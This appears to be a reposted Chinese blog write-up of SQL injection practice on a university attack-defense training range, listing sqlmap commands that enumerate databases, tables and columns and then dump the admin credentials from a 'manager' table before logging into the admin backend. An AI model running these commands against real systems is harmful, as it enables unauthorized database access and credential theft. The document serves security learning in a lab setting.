SQL注入学习-RDCTF靶机实战1

sqlmap的使用

Ps:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

本次使用的命令

sqlmap.py -u {
    
    URL} //查看是否有注入点
sqlmap.py -u {
    
    URL} -dbs //爆数据库
sqlmap.py -u {
    
    URL} -D db --tables //爆数据表
sqlmap.py -u {
    
    URL} -D db -T table --columns  //爆字段
sqlmap.py -u {
    
    URL} -D db -T table -C column(s) --dump  //输出字段

实际操作

本次使用江西软件大学网络攻防靶场做练习在这里插入图片描述
开启环境寻找注入点
在这里插入图片描述
在浏览学校文章处找到了注入点,尝试开始使用sqlmap爆破
在这里插入图片描述

找到了注入点,开始爆数据库!
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -dbs

选择rjxy数据库,开始爆表名!
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.XXX.XXX:28031/index/narticle.php?nid=3024 -D rjxy --tables

选择manager表爆字段
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager --columns

查询管理员密码
在这里插入图片描述

payload:
sqlmap.py -u http://117.167.136.244:28031/index/narticle.php?nid=3024 -D rjxy -T manager -C username,password --dump

此时得到管理员admin账户的密码,Base64解密后进行MD5解密,得到密码在这里插入图片描述

访问robots.txt查询管理员后台
在这里插入图片描述
进入管理员后台界面
在这里插入图片描述
成功进入后台界面!在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/qq_46231152/article/details/108518831